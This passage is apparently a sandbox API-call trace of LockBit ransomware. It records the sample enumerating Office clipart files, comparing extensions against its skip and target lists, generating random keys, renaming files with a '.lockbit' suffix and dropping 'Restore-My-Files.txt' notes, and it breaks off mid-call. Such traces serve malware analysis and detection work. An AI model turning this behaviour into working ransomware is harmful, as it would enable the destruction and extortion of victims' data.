lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.428] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00564_.WMF") returned 1 [0114.429] lstrcmpiW (lpString1="ntldr", lpString2="FD00564_.WMF") returned 1 [0114.429] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00564_.WMF") returned 1 [0114.429] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00564_.WMF") returned -1 [0114.429] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00564_.WMF") returned -1 [0114.429] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00564_.WMF") returned 1 [0114.429] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00564_.WMF") returned 1 [0114.429] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.429] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned=".WMF" [0114.429] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.429] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.429] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.430] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.431] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.431] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.lockbit") returned 72 [0114.431] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0114.431] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.431] malloc (_Size=0x40068) returned 0x3d70450 [0114.432] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=896) returned 1 [0114.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.432] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0114.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0114.433] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.440] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.440] malloc (_Size=0xa6) returned 0x77d7a8 [0114.440] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.441] free (_Block=0x77d7a8) [0114.441] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.441] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.442] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.442] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4dd7200, ftCreationTime.dwHighDateTime=0x1bd4af4, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd4dd7200, ftLastWriteTime.dwHighDateTime=0x1bd4af4, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00586_.WMF", cAlternateFileName="")) returned 1 [0114.442] lstrcmpiW (lpString1=".", lpString2="FD00586_.WMF") returned -1 [0114.442] lstrcmpiW (lpString1="..", lpString2="FD00586_.WMF") returned -1 [0114.442] PathFindExtensionW (pszPath="FD00586_.WMF") returned=".WMF" [0114.442] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.442] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.443] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.443] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.444] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00586_.WMF") returned 1 [0114.444] lstrcmpiW (lpString1="ntldr", lpString2="FD00586_.WMF") returned 1 [0114.444] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00586_.WMF") returned 1 [0114.444] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00586_.WMF") returned -1 [0114.444] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00586_.WMF") returned -1 [0114.444] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00586_.WMF") returned 1 [0114.444] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00586_.WMF") returned 1 [0114.444] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.445] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF") returned=".WMF" [0114.445] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.445] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.445] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.446] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.446] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.lockbit") returned 72 [0114.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0114.447] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.447] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.447] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=752) returned 1 [0114.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.448] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.453] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.453] malloc (_Size=0xa6) returned 0x77d7a8 [0114.453] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.454] free (_Block=0x77d7a8) [0114.454] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00586_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.454] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.454] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.454] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef0a100, ftCreationTime.dwHighDateTime=0x1bd4b36, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbef0a100, ftLastWriteTime.dwHighDateTime=0x1bd4b36, nFileSizeHigh=0x0, nFileSizeLow=0x2b90, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00775_.WMF", cAlternateFileName="")) returned 1 [0114.455] lstrcmpiW (lpString1=".", lpString2="FD00775_.WMF") returned -1 [0114.455] lstrcmpiW (lpString1="..", lpString2="FD00775_.WMF") returned -1 [0114.455] PathFindExtensionW (pszPath="FD00775_.WMF") returned=".WMF" [0114.455] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.455] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.456] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.456] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.457] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00775_.WMF") returned 1 [0114.457] lstrcmpiW (lpString1="ntldr", lpString2="FD00775_.WMF") returned 1 [0114.457] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00775_.WMF") returned 1 [0114.457] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00775_.WMF") returned -1 [0114.457] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00775_.WMF") returned -1 [0114.457] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00775_.WMF") returned 1 [0114.457] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00775_.WMF") returned 1 [0114.457] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.457] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned=".WMF" [0114.458] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.458] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.458] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.459] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.459] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.lockbit") returned 72 [0114.459] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0114.460] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.460] malloc (_Size=0x40068) returned 0x3e70008 [0114.460] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11152) returned 1 [0114.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0114.461] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0114.461] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0114.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.466] malloc (_Size=0xa6) returned 